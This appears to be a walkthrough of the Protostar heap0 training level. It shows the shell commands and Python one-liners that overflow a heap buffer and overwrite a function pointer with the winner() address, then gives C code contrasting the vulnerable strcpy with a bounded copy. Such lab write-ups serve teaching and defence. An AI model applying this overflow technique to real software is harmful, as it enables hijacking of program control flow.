This level introduces heap overflows and how they can influence code flow.
Source Code:
Ok, this looks like it'll be similar to some of the stack overflow levels, except this time we want to overflow a data structure that's located on the heap.
First, let's see if we can overwrite f->fp() at all and cause a segfault:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*70")
data is at 0x804a008, fp is at 0x804a050
level has not been passed
No. Let's try again with more data:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*170")
data is at 0x804a008, fp is at 0x804a050
Segmentation fault
Got it!
Ok, now let's find the address we want to overwrite f->fp() with:
user@protostar:/opt/protostar/bin$ objdump -t ./heap0 | grep "winner"
08048464 g F .text 00000014 winner
08048478 g F .text 00000014 nowinner
Ok, now let's overwrite f->fp() with that address:
user@protostar:/opt/protostar/bin$ ./heap0 $(python -c "print 'x'*72 + '\x64\x84\x04\x08'")
data is at 0x804a008, fp is at 0x804a050
level passed
Done!
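As an added illustration (not code from the level or from this post), the layout below reproduces what the two printed addresses imply: the name buffer and the function pointer are 72 bytes apart, so an unbounded strcpy puts byte 73 of the argument onto f->fp. It shows that vulnerable copy beside a bounded one that rejects such input before anything is written; apart from nowinner and the two struct names, the function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Layout as in the level: a 64-byte name buffer in one chunk and a function
 * pointer in the next. The level prints them at 0x804a008 and 0x804a050, 72
 * bytes apart (64 bytes of name plus the 8-byte glibc chunk header in front
 * of the second object), which is why 72 bytes of padding land the next 4
 * bytes on f->fp. */
struct data { char name[64]; };
struct fp   { int (*fp)(void); };
static int nowinner(void) { puts("level has not been passed"); return 0; }

/* The level's pattern: an unbounded strcpy, so any argument of 64+ characters
 * runs past name into whatever follows it on the heap. */
void copy_name_unchecked(struct data *d, const char *src) { strcpy(d->name, src); }

/* Hardened copy: accept the input only if its terminator lies inside the
 * buffer. Returns 0 on success, -1 when the input would overflow. */
int copy_name_checked(struct data *d, const char *src)
{
    const char *nul = memchr(src, '\0', sizeof d->name);
    if (nul == NULL)
        return -1;                       /* no NUL within 64 bytes */
    memcpy(d->name, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Mirrors the level's main() with the checked copy in place of strcpy.
 * Returns f->fp()'s result (0 from nowinner) for accepted input, or -1
 * when the input is rejected before anything is written. */
int run_level_checked(const char *arg)
{
    struct data *d = malloc(sizeof *d);
    struct fp   *f = malloc(sizeof *f);
    int rc = -1;
    if (d && f) {
        f->fp = nowinner;
        if (copy_name_checked(d, arg) == 0)
            rc = f->fp();                /* fp untouched, so still nowinner */
    }
    free(f);
    free(d);
    return rc;
}

/* Constructed test input: a string of n 'x' characters (n < 256). */
const char *xs(size_t n)
{
    static char buf[256];
    memset(buf, 'x', n);
    buf[n] = '\0';
    return buf;
}
```

With the checked copy, the 70- and 170-byte arguments from the walkthrough are rejected outright, and the function pointer can never be reached from the name buffer.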
Great, thanks!